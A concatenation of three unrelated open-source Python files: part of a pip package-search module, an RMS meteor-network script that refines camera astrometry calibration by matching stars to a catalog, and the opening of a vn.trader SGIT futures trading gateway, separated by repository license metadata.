        summary = hit['summary']
        version = hit['version']
        score = hit['_pypi_ordering']
        # A missing ordering from the index is treated as the lowest score
        if score is None:
            score = 0

        # Idiomatic membership test (was `name not in packages.keys()`)
        if name not in packages:
            packages[name] = {
                'name': name,
                'summary': summary,
                'versions': [version],
                'score': score,
            }
        else:
            packages[name]['versions'].append(version)

            # if this is the highest version, replace summary and score
            if version == highest_version(packages[name]['versions']):
                packages[name]['summary'] = summary
                packages[name]['score'] = score

    # each record has a unique name now, so we will convert the dict into a
    # list sorted by score
    package_list = sorted(
        packages.values(),
        key=lambda x: x['score'],
        reverse=True,
    )
    return package_list
def print_results(hits, name_column_width=None, terminal_width=None):
    """Log one formatted line per hit; for installed packages also log the
    installed vs. latest version underneath, indented."""
    if not hits:
        return
    # Width of the "name (version)" column; sized to the longest hit + padding
    if name_column_width is None:
        name_column_width = max([
            len(hit['name']) + len(hit.get('versions', ['-'])[-1])
            for hit in hits
        ]) + 4

    installed_packages = [p.project_name for p in pkg_resources.working_set]
    for hit in hits:
        name = hit['name']
        summary = hit['summary'] or ''
        version = hit.get('versions', ['-'])[-1]
        if terminal_width is not None:
            # wrap and indent summary to fit terminal
            summary = textwrap.wrap(
                summary,
                terminal_width - name_column_width - 5,
            )
            summary = ('\n' + ' ' * (name_column_width + 3)).join(summary)

        line = '%-*s - %s' % (name_column_width,
                              '%s (%s)' % (name, version), summary)
        try:
            logger.info(line)
            if name in installed_packages:
                dist = pkg_resources.get_distribution(name)
                with indent_log():
                    latest = highest_version(hit['versions'])
                    if dist.version == latest:
                        logger.info('INSTALLED: %s (latest)', dist.version)
                    else:
                        logger.info('INSTALLED: %s', dist.version)
                        logger.info('LATEST: %s', latest)
        # Skip hits whose text cannot be encoded to the output stream
        except UnicodeEncodeError:
            pass
def highest_version(versions):
    """Return the highest of *versions*, compared by PEP 440 ordering."""
    return max(versions, key=pkg_resources.parse_version)
| mit |
CroatianMeteorNetwork/RMS | RMS/Astrometry/CheckFit.py | 1 | 25717 | """ Automatic refining of astrometry calibration. The initial astrometric calibration is needed, which will be
refined by using all stars from a given night.
"""
from __future__ import print_function, division, absolute_import
import os
import sys
import copy
import shutil
import random
import argparse
import numpy as np
import scipy.optimize
import matplotlib.pyplot as plt
import RMS.ConfigReader as cr
from RMS.Formats import Platepar
from RMS.Formats import CALSTARS
from RMS.Formats import StarCatalog
from RMS.Formats import FFfile
from RMS.Astrometry.ApplyAstrometry import raDecToXYPP, xyToRaDecPP, rotationWrtHorizon, getFOVSelectionRadius
from RMS.Astrometry.Conversions import date2JD, jd2Date, raDec2AltAz
from RMS.Astrometry.FFTalign import alignPlatepar
from RMS.Math import angularSeparation
# Import Cython functions
import pyximport
pyximport.install(setup_args={'include_dirs':[np.get_include()]})
from RMS.Astrometry.CyFunctions import matchStars, subsetCatalog
def computeMinimizationTolerances(config, platepar, star_dict_len):
    """ Compute tolerances for minimization.

    Arguments:
        config: [Config structure]
        platepar: [Platepar structure] Astrometry parameters.
        star_dict_len: [int] Number of images with extracted stars.

    Return:
        (fatol, xatol_ang): [tuple of floats] Cost-function tolerance and
            angular parameter tolerance (degrees).
    """

    # Cost-function tolerance, weighted the same way as the cost function
    # itself so the fit stops at the desired distance precision
    n_weight = np.sqrt(star_dict_len*config.min_matched_stars + 1)
    fatol = (config.dist_check_threshold**2)/n_weight

    # Angular tolerance: the distance threshold expressed as an angle across
    # the image width
    fov_width_deg = platepar.X_res/platepar.F_scale
    xatol_ang = config.dist_check_threshold*fov_width_deg/platepar.X_res

    return fatol, xatol_ang
def matchStarsResiduals(config, platepar, catalog_stars, star_dict, match_radius, ret_nmatch=False, \
    sky_coords=False, lim_mag=None, verbose=False):
    """ Match the image and catalog stars with the given astrometry solution and estimate the residuals
        between them.

    Arguments:
        config: [Config structure]
        platepar: [Platepar structure] Astrometry parameters.
        catalog_stars: [ndarray] An array of catalog stars (ra, dec, mag).
        star_dict: [dict] A dictionary where the keys are JDs when the stars were recorded and values are
            2D list of stars, each entry is (X, Y, bg_level, level, fwhm).
        match_radius: [float] Maximum radius for star matching (pixels). The per-image minimum number of
            matched stars is taken from config.min_matched_stars.

    Keyword arguments:
        ret_nmatch: [bool] If True, the function returns the number of matched stars and the average
            deviation. False by default.
        sky_coords: [bool] If True, sky coordinate residuals in RA, dec will be used to compute the cost
            function, not image coordinates.
        lim_mag: [float] Override the limiting magnitude from config. None by default.
        verbose: [bool] Print results. False by default.

    Return:
        cost: [float] The cost function which weights the number of matched stars and the average deviation.
            If ret_nmatch is True, (n_matched, avg_dist, cost, matched_stars) is returned instead.
    """

    if lim_mag is None:
        lim_mag = config.catalog_mag_limit

    # Estimate the FOV radius
    fov_radius = getFOVSelectionRadius(platepar)

    # Dictionary containing the matched stars, the keys are JDs of every image
    matched_stars = {}

    # Go through every FF image and its stars
    for jd in star_dict:

        # Estimate RA,dec of the centre of the FOV
        _, RA_c, dec_c, _ = xyToRaDecPP([jd2Date(jd)], [platepar.X_res/2], [platepar.Y_res/2], [1], \
            platepar, extinction_correction=False)

        RA_c = RA_c[0]
        dec_c = dec_c[0]

        # Get stars from the catalog around the defined center in a given radius
        _, extracted_catalog = subsetCatalog(catalog_stars, RA_c, dec_c, jd, platepar.lat, platepar.lon, \
            fov_radius, lim_mag)
        ra_catalog, dec_catalog, mag_catalog = extracted_catalog.T

        # Extract stars for the given Julian date
        stars_list = star_dict[jd]
        stars_list = np.array(stars_list)

        # Convert all catalog stars to image coordinates
        cat_x_array, cat_y_array = raDecToXYPP(ra_catalog, dec_catalog, jd, platepar)

        # Take only those catalog stars which project inside the image bounds
        x_indices = np.argwhere((cat_x_array >= 0) & (cat_x_array < platepar.X_res))
        y_indices = np.argwhere((cat_y_array >= 0) & (cat_y_array < platepar.Y_res))
        cat_good_indices = np.intersect1d(x_indices, y_indices).astype(np.uint32)

        # Match image and catalog stars (Cython routine)
        matched_indices = matchStars(stars_list, cat_x_array, cat_y_array, cat_good_indices, match_radius)

        # Skip this image if too few stars were matched
        if len(matched_indices) < config.min_matched_stars:
            continue

        matched_indices = np.array(matched_indices)
        matched_img_inds, matched_cat_inds, dist_list = matched_indices.T

        # Extract data from matched stars
        # NOTE(review): np.int is deprecated and removed in NumPy >= 1.24 - consider plain int
        matched_img_stars = stars_list[matched_img_inds.astype(np.int)]
        matched_cat_stars = extracted_catalog[matched_cat_inds.astype(np.int)]

        # Put the matched stars to a dictionary
        matched_stars[jd] = [matched_img_stars, matched_cat_stars, dist_list]

    # If residuals on the image should be computed
    if not sky_coords:

        unit_label = 'px'

        # Extract all pixel distances across all images
        global_dist_list = []
        for jd in matched_stars:
            _, _, dist_list = matched_stars[jd]
            global_dist_list += dist_list.tolist()

    # Compute the residuals on the sky
    else:

        unit_label = 'arcmin'

        global_dist_list = []

        # Go through all matched stars
        for jd in matched_stars:

            matched_img_stars, matched_cat_stars, dist_list = matched_stars[jd]

            # Go through all stars on the image
            for img_star_entry, cat_star_entry in zip(matched_img_stars, matched_cat_stars):

                # Extract star coords (image entries are stored (Y, X, ...))
                star_y = img_star_entry[0]
                star_x = img_star_entry[1]
                cat_ra = cat_star_entry[0]
                cat_dec = cat_star_entry[1]

                # Convert image coordinates to RA/Dec
                _, star_ra, star_dec, _ = xyToRaDecPP([jd2Date(jd)], [star_x], [star_y], [1], \
                    platepar, extinction_correction=False)

                # Compute angular distance between the predicted and the catalog position
                ang_dist = np.degrees(angularSeparation(np.radians(cat_ra), np.radians(cat_dec), \
                    np.radians(star_ra[0]), np.radians(star_dec[0])))

                # Store the angular separation in arc minutes
                global_dist_list.append(ang_dist*60)

    # Number of matched stars
    n_matched = len(global_dist_list)

    if n_matched == 0:

        if verbose:
            print('No matched stars with radius {:.1f} px!'.format(match_radius))

        # Sentinel values signal a failed match to the caller
        if ret_nmatch:
            return 0, 9999.0, 9999.0, {}
        else:
            return 9999.0

    # Calculate the median distance; the cost rewards many matches and small residuals
    avg_dist = np.median(global_dist_list)

    cost = (avg_dist**2)*(1.0/np.sqrt(n_matched + 1))

    if verbose:
        print()
        print("Matched {:d} stars with radius of {:.1f} px".format(n_matched, match_radius))
        print(" Average distance = {:.3f} {:s}".format(avg_dist, unit_label))
        print(" Cost function = {:.5f}".format(cost))

    if ret_nmatch:
        return n_matched, avg_dist, cost, matched_stars
    else:
        return cost
def checkFitGoodness(config, platepar, catalog_stars, star_dict, match_radius, verbose=False):
    """ Decide whether the given platepar is 'good enough' for the extracted star positions.

    The fit is accepted on 2 criteria: the median star residual (in pixels) has to be below the
    configured threshold, and on average at least one star per used image has to be matched.

    Arguments:
        config: [Config structure]
        platepar: [Platepar structure] Initial astrometry parameters.
        catalog_stars: [ndarray] An array of catalog stars (ra, dec, mag).
        star_dict: [dict] Keys are JDs when the stars were recorded, values are 2D lists of stars,
            each entry is (X, Y, bg_level, level).
        match_radius: [float] Maximum radius for star matching (pixels).

    Keyword arguments:
        verbose: [bool] If True, fit status will be printed on the screen. False by default.

    Return:
        [bool] True if the platepar is good, False otherwise.
    """

    if verbose:
        print()
        print("CHECK FIT GOODNESS:")

    # Match the stars and compute the residuals
    n_matched, avg_dist, _, _ = matchStarsResiduals(config, platepar, catalog_stars, star_dict, \
        match_radius, ret_nmatch=True, verbose=verbose)

    # Reject the fit outright if the median residual exceeds the threshold
    if avg_dist > config.dist_check_threshold:
        return False

    if verbose:
        print()
        print('The minimum residual is satisfied!')

    # Require at least one matched star per used image, on average
    if n_matched >= len(star_dict)*1:
        return True

    if verbose:
        print('But there are not enough stars on every image, recalibrating...')

    return False
def _calcImageResidualsAstro(params, config, platepar, catalog_stars, star_dict, match_radius):
    """ Cost function for astrometry minimization: residuals between image and catalog stars for a
        trial pointing/scale.

    Arguments:
        params: [list] Fit parameters - reference RA, Dec, position angle, and scale.
        config: [Config]
        platepar: [Platepar]
        catalog_stars: [list] List of (ra, dec, mag) entries (angles in degrees).
        star_dict: [dict] Dictionary which contains the JD, and a list of (X, Y, bg_intens, intens)
            of the stars on the image.
        match_radius: [float] Star match radius (px).

    Return:
        [float] The average pixel residual (difference between image and catalog positions)
            normalized by the square root of the total number of matched stars.
    """

    # Work on a clone so the caller's platepar stays untouched
    pp = copy.deepcopy(platepar)

    # Apply the trial pointing and scale parameters to the clone
    pp.RA_d, pp.dec_d, pp.pos_angle_ref, pp.F_scale = params

    # Evaluate the match cost with the trial parameters
    return matchStarsResiduals(config, pp, catalog_stars, star_dict, match_radius, verbose=False)
def starListToDict(config, calstars_list, max_ffs=None):
    """ Convert the CALSTARS list into a dictionary mapping each FF file's JD to its list of
        (X, Y, bg_intens, intens) star entries.

    Arguments:
        config: [Config structure]
        calstars_list: [list] List of (ff_file, star_data) pairs from the CALSTARS file.

    Keyword arguments:
        max_ffs: [int] If given, randomly subsample the result to at most this many FF files.

    Return:
        star_dict: [dict] {JD: star list} for every FF file with enough stars.
    """

    # Deduplicate by FF file name (later entries win)
    calstars = dict(calstars_list)

    star_dict = {}

    # Keep only FF files with a sufficient number of detected stars
    for ff_name, star_data in calstars.items():

        if len(star_data) < config.ff_min_stars:
            continue

        # Key the entry by the JD of the FF file's middle time
        dt = FFfile.getMiddleTimeFF(ff_name, config.fps, ret_milliseconds=True)
        star_dict[date2JD(*dt)] = star_data

    # Optionally limit the number of FF files by random subsampling
    if (max_ffs is not None) and (len(star_dict) > max_ffs):
        rand_keys = random.sample(list(star_dict), max_ffs)
        star_dict = {key: star_dict[key] for key in rand_keys}

    return star_dict
def autoCheckFit(config, platepar, calstars_list, _fft_refinement=False):
    """ Attempts to refine the astrometry fit with the given stars and initial astrometry parameters.

    Arguments:
        config: [Config structure]
        platepar: [Platepar structure] Initial astrometry parameters.
        calstars_list: [list] A list containing stars extracted from FF files. See RMS.Formats.CALSTARS for
            more details.

    Keyword arguments:
        _fft_refinement: [bool] Internal flag indicating that autoCF is running the second time recursively
            after FFT platepar adjustment.

    Return:
        (platepar, fit_status):
            platepar: [Platepar structure] Estimated/refined platepar.
            fit_status: [bool] True if fit was successful, False if not.
    """

    def _handleFailure(config, platepar, calstars_list, catalog_stars, _fft_refinement):
        """ Run FFT alignment before giving up on ACF. """

        if not _fft_refinement:

            print()
            print("-------------------------------------------------------------------------------")
            print('The initial platepar is bad, trying to refine it using FFT phase correlation...')
            print()

            # Prepare data for FFT image registration
            calstars_dict = {ff_file: star_data for ff_file, star_data in calstars_list}

            # Extract star list from CALSTARS file from FF file with most stars
            max_len_ff = max(calstars_dict, key=lambda k: len(calstars_dict[k]))

            # Take only X, Y (change order so X is first)
            calstars_coords = np.array(calstars_dict[max_len_ff])[:, :2]
            calstars_coords[:, [0, 1]] = calstars_coords[:, [1, 0]]

            # Get the time of the FF file
            calstars_time = FFfile.getMiddleTimeFF(max_len_ff, config.fps, ret_milliseconds=True)

            # Try aligning the platepar using FFT image registration
            platepar_refined = alignPlatepar(config, platepar, calstars_time, calstars_coords)

            print()

            ### If there are still not enough stars matched, try FFT again ###
            min_radius = 10

            # Prepare star dictionary to check the match
            dt = FFfile.getMiddleTimeFF(max_len_ff, config.fps, ret_milliseconds=True)
            jd = date2JD(*dt)
            star_dict_temp = {}
            star_dict_temp[jd] = calstars_dict[max_len_ff]

            # Check the number of matched stars
            n_matched, _, _, _ = matchStarsResiduals(config, platepar_refined, catalog_stars, \
                star_dict_temp, min_radius, ret_nmatch=True, verbose=True)

            # Realign again if necessary
            if n_matched < config.min_matched_stars:
                print()
                print("-------------------------------------------------------------------------------")
                print('Doing a second FFT pass as the number of matched stars was too small...')
                print()
                platepar_refined = alignPlatepar(config, platepar_refined, calstars_time, calstars_coords)
                print()

            ### ###

            # Redo autoCF (the recursion is bounded: _fft_refinement=True forces the else branch next time)
            return autoCheckFit(config, platepar_refined, calstars_list, _fft_refinement=True)

        else:
            print('Auto Check Fit failed completely, please redo the plate manually!')
            return platepar, False

    if _fft_refinement:
        print('Second ACF run with an updated platepar via FFT phase correlation...')

    # Load catalog stars (overwrite the mag band ratios if specific catalog is used)
    catalog_stars, _, config.star_catalog_band_ratios = StarCatalog.readStarCatalog(config.star_catalog_path, \
        config.star_catalog_file, lim_mag=config.catalog_mag_limit, \
        mag_band_ratios=config.star_catalog_band_ratios)

    # Dictionary which will contain the JD, and a list of (X, Y, bg_intens, intens) of the stars
    star_dict = starListToDict(config, calstars_list, max_ffs=config.calstars_files_N)

    # There has to be a minimum number of FF files for star fitting
    if len(star_dict) < config.calstars_files_N:
        print('Not enough FF files in CALSTARS for ACF!')
        return platepar, False

    # Calculate the total number of calibration stars used
    total_calstars = sum([len(star_dict[key]) for key in star_dict])
    print('Total calstars:', total_calstars)

    if total_calstars < config.calstars_min_stars:
        print('Not enough calibration stars, need at least', config.calstars_min_stars)
        return platepar, False

    print()

    # A list of matching radiuses to try
    min_radius = 0.5
    radius_list = [10, 5, 3, 1.5, min_radius]

    # Calculate the function tolerance, so the desired precision can be reached (the number is calculated
    # in the same regard as the cost function)
    fatol, xatol_ang = computeMinimizationTolerances(config, platepar, len(star_dict))

    ### If the initial match is good enough, do only quick recalibration ###

    # Match the stars and calculate the residuals
    n_matched, avg_dist, cost, _ = matchStarsResiduals(config, platepar, catalog_stars, star_dict, \
        min_radius, ret_nmatch=True)

    if n_matched >= config.calstars_files_N:

        # Check if the average distance with the tightest radius is close
        if avg_dist < config.dist_check_quick_threshold:
            print("Using quick fit with smaller radiia...")

            # Use a reduced set of initial radius values
            radius_list = [1.5, min_radius]

    ##########

    # Match increasingly smaller search radii around image stars
    for i, match_radius in enumerate(radius_list):

        # Match the stars and calculate the residuals
        n_matched, avg_dist, cost, _ = matchStarsResiduals(config, platepar, catalog_stars, star_dict, \
            match_radius, ret_nmatch=True)

        print()
        print("-------------------------------------------------------------")
        print("Refining camera pointing with max pixel deviation = {:.1f} px".format(match_radius))
        print("Initial values:")
        print(" Matched stars = {:>6d}".format(n_matched))
        print(" Average deviation = {:>6.2f} px".format(avg_dist))

        # The initial number of matched stars has to be at least the number of FF images, otherwise it
        # means that the initial platepar is no good
        if n_matched < config.calstars_files_N:
            print("The total number of initially matched stars is too small! Please manually redo the plate or make sure there are enough calibration stars.")

            # Try to refine the platepar with FFT phase correlation and redo the ACF
            return _handleFailure(config, platepar, calstars_list, catalog_stars, _fft_refinement)

        # Check if the platepar is good enough and do not estimate further parameters
        if checkFitGoodness(config, platepar, catalog_stars, star_dict, min_radius, verbose=True):

            # Print out notice only if the platepar is good right away
            if i == 0:
                print("Initial platepar is good enough!")

            return platepar, True

        # Initial parameters for the astrometric fit
        p0 = [platepar.RA_d, platepar.dec_d, platepar.pos_angle_ref, platepar.F_scale]

        # Fit the astrometric parameters
        res = scipy.optimize.minimize(_calcImageResidualsAstro, p0, args=(config, platepar, catalog_stars, \
            star_dict, match_radius), method='Nelder-Mead', \
            options={'fatol': fatol, 'xatol': xatol_ang})

        print(res)

        # If the fit was not successful, stop further fitting
        if not res.success:

            # Try to refine the platepar with FFT phase correlation and redo the ACF
            return _handleFailure(config, platepar, calstars_list, catalog_stars, _fft_refinement)

        else:
            # If the fit was successful, use the new parameters from now on
            ra_ref, dec_ref, pos_angle_ref, F_scale = res.x

            platepar.RA_d = ra_ref
            platepar.dec_d = dec_ref
            platepar.pos_angle_ref = pos_angle_ref
            platepar.F_scale = F_scale

        # Check if the platepar is good enough and do not estimate further parameters
        if checkFitGoodness(config, platepar, catalog_stars, star_dict, min_radius, verbose=True):
            return platepar, True

    # Match the stars and calculate the residuals
    n_matched, avg_dist, cost, matched_stars = matchStarsResiduals(config, platepar, catalog_stars, \
        star_dict, min_radius, ret_nmatch=True)

    # BUGFIX: was "{:.1}" (general format, 1 significant digit); "{:.1f}" matches the other printouts
    print("FINAL SOLUTION with radius {:.1f} px:".format(min_radius))
    print(" Matched stars = {:>6d}".format(n_matched))
    print(" Average deviation = {:>6.2f} px".format(avg_dist))

    # Mark the platepar to indicate that it was automatically refined with CheckFit
    platepar.auto_check_fit_refined = True

    # Recompute alt/az of the FOV centre
    platepar.az_centre, platepar.alt_centre = raDec2AltAz(platepar.RA_d, platepar.dec_d, platepar.JD, \
        platepar.lat, platepar.lon)

    # Recompute the rotation wrt horizon
    platepar.rotation_from_horiz = rotationWrtHorizon(platepar)

    return platepar, True
if __name__ == "__main__":
### COMMAND LINE ARGUMENTS
# Init the command line arguments parser
arg_parser = argparse.ArgumentParser(description="Check if the calibration file matches the stars, and improve it.")
arg_parser.add_argument('dir_path', nargs=1, metavar='DIR_PATH', type=str, \
help='Path to the folder with FF or image files. This folder also has to contain the platepar file.')
arg_parser.add_argument('-c', '--config', nargs=1, metavar='CONFIG_PATH', type=str, \
help="Path to a config file which will be used instead of the default one.")
# Parse the command line arguments
cml_args = arg_parser.parse_args()
#########################
dir_path = cml_args.dir_path[0]
# Check if the given directory is OK
if not os.path.exists(dir_path):
print('No such directory:', dir_path)
sys.exit()
# Load the config file
config = cr.loadConfigFromDirectory(cml_args.config, dir_path)
# Get a list of files in the night folder
file_list = os.listdir(dir_path)
# Find and load the platepar file
if config.platepar_name in file_list:
# Load the platepar
platepar = Platepar.Platepar()
platepar.read(os.path.join(dir_path, config.platepar_name), use_flat=config.use_flat)
else:
print('Cannot find the platepar file in the night directory: ', config.platepar_name)
sys.exit()
# Find the CALSTARS file in the given folder
calstars_file = None
for calstars_file in file_list:
if ('CALSTARS' in calstars_file) and ('.txt' in calstars_file):
break
if calstars_file is None:
print('CALSTARS file could not be found in the given directory!')
sys.exit()
# Load the calstars file
calstars_list = CALSTARS.readCALSTARS(dir_path, calstars_file)
print('CALSTARS file: ' + calstars_file + ' loaded!')
# Run the automatic astrometry fit
pp, fit_status = autoCheckFit(config, platepar, calstars_list)
# If the fit suceeded, save the platepar
if fit_status:
print('ACF sucessful!')
# Save the old platepar
shutil.move(os.path.join(dir_path, config.platepar_name), os.path.join(dir_path,
config.platepar_name + '.old'))
# Save the new platepar
pp.write(os.path.join(dir_path, config.platepar_name)) | gpl-3.0 |
# encoding: UTF-8
'''
vn.sgit的gateway接入
飞鼠接口的委托数据更新是分散在多个推送里的:
1. 下单后,通过onRtnOrder通知是否成功,没有ErrorID说明委托到了交易所
2. 后续的成交状态,通过onRtnTrade通知,用户自行累加
3. 撤单的确认,通过onRspOrderAction通知
为了获取实时的委托状态,需要用户自行把这三个数据合并起来,
因此在TdApi中维护了一个委托数据的缓存字典,对vn.trader系统中推送的是本地委托号,
在Gateway中和委托系统号对应起来
飞鼠的撤单需要使用:交易所代码+交易所的系统委托号,撤单时从缓存中
获取委托的系统编号
'''
import os
import json
from vnsgitmd import MdApi
from vnsgittd import TdApi
from sgitDataType import *
from vtGateway import *
# Mapping dictionaries between VT constants and SGIT (Feishu counter) API constants.
# Each forward map translates a VT constant into the SGIT define value for requests;
# each *Reverse map inverts it for decoding values received from the API.

# Price type mapping
priceTypeMap = {}
priceTypeMap[PRICETYPE_LIMITPRICE] = defineDict["Sgit_FTDC_OPT_LimitPrice"]
priceTypeMap[PRICETYPE_MARKETPRICE] = defineDict["Sgit_FTDC_OPT_AnyPrice"]
priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()}

# Direction (buy/sell) mapping
directionMap = {}
directionMap[DIRECTION_LONG] = defineDict['Sgit_FTDC_D_Buy']
directionMap[DIRECTION_SHORT] = defineDict['Sgit_FTDC_D_Sell']
directionMapReverse = {v: k for k, v in directionMap.items()}

# Offset (open/close) mapping
offsetMap = {}
offsetMap[OFFSET_OPEN] = defineDict['Sgit_FTDC_OF_Open']
offsetMap[OFFSET_CLOSE] = defineDict['Sgit_FTDC_OF_Close']
offsetMap[OFFSET_CLOSETODAY] = defineDict['Sgit_FTDC_OF_CloseToday']
offsetMap[OFFSET_CLOSEYESTERDAY] = defineDict['Sgit_FTDC_OF_CloseYesterday']
offsetMapReverse = {v:k for k,v in offsetMap.items()}

# Exchange mapping
exchangeMap = {}
exchangeMap[EXCHANGE_CFFEX] = defineDict['Sgit_FTDC_EIDT_CFFEX']
exchangeMap[EXCHANGE_SHFE] = defineDict['Sgit_FTDC_EIDT_SHFE']
exchangeMap[EXCHANGE_CZCE] = defineDict['Sgit_FTDC_EIDT_CZCE']
exchangeMap[EXCHANGE_DCE] = defineDict['Sgit_FTDC_EIDT_DCE']
exchangeMap[EXCHANGE_SGE] = defineDict['Sgit_FTDC_EIDT_GOLD']
exchangeMap[EXCHANGE_UNKNOWN] = ''
exchangeMapReverse = {v:k for k,v in exchangeMap.items()}

# Position direction mapping
posiDirectionMap = {}
posiDirectionMap[DIRECTION_NET] = defineDict["Sgit_FTDC_PD_Net"]
posiDirectionMap[DIRECTION_LONG] = defineDict["Sgit_FTDC_PD_Long"]
posiDirectionMap[DIRECTION_SHORT] = defineDict["Sgit_FTDC_PD_Short"]
posiDirectionMapReverse = {v:k for k,v in posiDirectionMap.items()}

# Order status mapping
orderStatusMap = {}
orderStatusMap[STATUS_ALLTRADED] = defineDict["Sgit_FTDC_OST_AllTraded"]
orderStatusMap[STATUS_PARTTRADED] = defineDict["Sgit_FTDC_OST_PartTradedQueueing"]
orderStatusMap[STATUS_NOTTRADED] = defineDict["Sgit_FTDC_OST_NoTradeQueueing"]
orderStatusMap[STATUS_CANCELLED] = defineDict["Sgit_FTDC_OST_Canceled"]
orderStatusMapReverse = {v:k for k,v in orderStatusMap.items()}
########################################################################
class SgitGateway(VtGateway):
    """SGIT (Feishu counter) gateway for vn.trader."""

    #----------------------------------------------------------------------
    def __init__(self, eventEngine, gatewayName='SGIT'):
        """Constructor"""
        super(SgitGateway, self).__init__(eventEngine, gatewayName)

        self.mdApi = SgitMdApi(self)     # market data API
        self.tdApi = SgitTdApi(self)     # trading API

        self.mdConnected = False         # md API connection status, True once login completes
        self.tdConnected = False         # td API connection status

        self.qryEnabled = False          # whether to run the periodic query loop

    #----------------------------------------------------------------------
    def connect(self):
        """Connect to the servers using the <gatewayName>_connect.json settings file."""
        # Load the json settings file
        fileName = self.gatewayName + '_connect.json'
        path = os.path.abspath(os.path.dirname(__file__))
        fileName = os.path.join(path, fileName)

        # BUGFIX: use open() in a with-block so the settings file handle is always closed
        # (the original used the deprecated file() builtin and never closed the handle)
        try:
            with open(fileName) as f:
                setting = json.load(f)
        except IOError:
            log = VtLogData()
            log.gatewayName = self.gatewayName
            log.logContent = u'读取连接配置出错,请检查'
            self.onLog(log)
            return

        # Extract the required fields from the settings
        try:
            userID = str(setting['userID'])
            password = str(setting['password'])
            brokerID = str(setting['brokerID'])
            tdAddress = str(setting['tdAddress'])
            mdAddress = str(setting['mdAddress'])
        except KeyError:
            log = VtLogData()
            log.gatewayName = self.gatewayName
            log.logContent = u'连接配置缺少字段,请检查'
            self.onLog(log)
            return

        # Create the market data and trading API connections
        self.mdApi.connect(userID, password, brokerID, mdAddress)
        self.tdApi.connect(userID, password, brokerID, tdAddress)

        # Initialise and start the periodic queries
        self.initQuery()

    #----------------------------------------------------------------------
    def subscribe(self, subscribeReq):
        """Subscribe to market data."""
        self.mdApi.subscribe(subscribeReq)

    #----------------------------------------------------------------------
    def sendOrder(self, orderReq):
        """Send an order; returns the vt order ID string."""
        return self.tdApi.sendOrder(orderReq)

    #----------------------------------------------------------------------
    def cancelOrder(self, cancelOrderReq):
        """Cancel an order."""
        self.tdApi.cancelOrder(cancelOrderReq)

    #----------------------------------------------------------------------
    def qryAccount(self):
        """Query account funds."""
        self.tdApi.qryAccount()

    #----------------------------------------------------------------------
    def qryPosition(self):
        """Query positions."""
        self.tdApi.qryPosition()

    #----------------------------------------------------------------------
    def close(self):
        """Close the API connections."""
        if self.mdConnected:
            self.mdApi.close()
        if self.tdConnected:
            self.tdApi.close()

    #----------------------------------------------------------------------
    def initQuery(self):
        """Initialise the periodic query loop."""
        if self.qryEnabled:
            # List of query functions to cycle through.
            # The Feishu counter pushes account funds actively, so no account query is needed.
            self.qryFunctionList = [self.qryPosition]

            self.qryCount = 0           # countdown toward the next query
            self.qryTrigger = 2         # number of timer events per query
            self.qryNextFunction = 0    # index of the next query function to run

            self.startQuery()

    #----------------------------------------------------------------------
    def query(self, event):
        """Query function registered on the event engine timer."""
        self.qryCount += 1

        if self.qryCount > self.qryTrigger:
            # Reset the countdown
            self.qryCount = 0

            # Run the next query function
            function = self.qryFunctionList[self.qryNextFunction]
            function()

            # Advance the index, wrapping around at the end of the list
            self.qryNextFunction += 1
            if self.qryNextFunction == len(self.qryFunctionList):
                self.qryNextFunction = 0

    #----------------------------------------------------------------------
    def startQuery(self):
        """Start the periodic queries."""
        self.eventEngine.register(EVENT_TIMER, self.query)

    #----------------------------------------------------------------------
    def setQryEnabled(self, qryEnabled):
        """Enable/disable the periodic query loop."""
        self.qryEnabled = qryEnabled
########################################################################
class SgitMdApi(MdApi):
    """SGIT market data API implementation."""

    #----------------------------------------------------------------------
    def __init__(self, gateway):
        """Constructor"""
        super(SgitMdApi, self).__init__()

        self.gateway = gateway                  # gateway object
        self.gatewayName = gateway.gatewayName  # gateway object name

        self.reqID = EMPTY_INT                  # request sequence number

        self.connectionStatus = False           # connection status
        self.loginStatus = False                # login status

        self.subscribedSymbols = set()          # subscribed contract requests

        self.userID = EMPTY_STRING              # account
        self.password = EMPTY_STRING            # password
        self.brokerID = EMPTY_STRING            # broker ID
        self.address = EMPTY_STRING             # server address

    #----------------------------------------------------------------------
    def connect(self, userID, password, brokerID, address):
        """Initialise the connection."""
        self.userID = userID                    # account
        self.password = password                # password
        self.brokerID = brokerID                # broker ID
        self.address = address                  # server address

        # If no server connection exists yet, connect
        if not self.connectionStatus:
            # Create the C++ API object; the argument is the folder used to store .con files
            path = os.getcwd() + '/temp/' + self.gatewayName + '/'
            if not os.path.exists(path):
                os.makedirs(path)
            self.createFtdcMdApi(path)

            # Subscribe to the market data stream
            self.subscribeMarketTopic(0)

            # Register the server address
            self.registerFront(self.address)

            # Initialise the connection; onFrontConnected is called on success
            self.init(False)

        # Already connected but not logged in: log in
        else:
            if not self.loginStatus:
                self.login()

    #----------------------------------------------------------------------
    def subscribe(self, subscribeReq):
        """Subscribe to a contract.

        If called before login completes, the request is cached and replayed
        automatically after a successful login."""
        if self.loginStatus:
            self.subQuot({'ContractID': str(subscribeReq.symbol)})
        self.subscribedSymbols.add(subscribeReq)

    #----------------------------------------------------------------------
    def login(self):
        """Log in."""
        # Only attempt the login when all credentials are set
        if self.userID and self.password and self.brokerID:
            req = {}
            req['UserID'] = self.userID
            req['Password'] = self.password
            req['BrokerID'] = self.brokerID
            self.reqID += 1
            self.reqUserLogin(req, self.reqID)

    #----------------------------------------------------------------------
    def close(self):
        """Close the connection."""
        self.exit()

    #----------------------------------------------------------------------
    def onFrontConnected(self):
        """Server connected callback."""
        self.connectionStatus = True

        log = VtLogData()
        log.gatewayName = self.gatewayName
        log.logContent = u'行情服务器连接成功'
        self.gateway.onLog(log)
        self.login()

    #----------------------------------------------------------------------
    def onFrontDisconnected(self, msg):
        """Server disconnected callback."""
        self.connectionStatus = False
        self.loginStatus = False
        self.gateway.mdConnected = False

        log = VtLogData()
        log.gatewayName = self.gatewayName
        log.logContent = u'行情服务器连接断开'
        self.gateway.onLog(log)

    #----------------------------------------------------------------------
    def onRspUserLogin(self, data, error, i, last):
        """Login response."""
        # On success, push a log event
        if error['ErrorID'] == 0:
            self.loginStatus = True
            self.gateway.mdConnected = True

            log = VtLogData()
            log.gatewayName = self.gatewayName
            log.logContent = u'行情服务器登录完成'
            self.gateway.onLog(log)

            # Signal readiness to the API
            self.ready()

            # Replay the subscriptions requested before login
            for subscribeReq in self.subscribedSymbols:
                self.subscribe(subscribeReq)

        # Otherwise push an error event
        else:
            err = VtErrorData()
            err.gatewayName = self.gatewayName
            err.errorID = error['ErrorID']
            err.errorMsg = error['ErrorMsg'].decode('gbk')
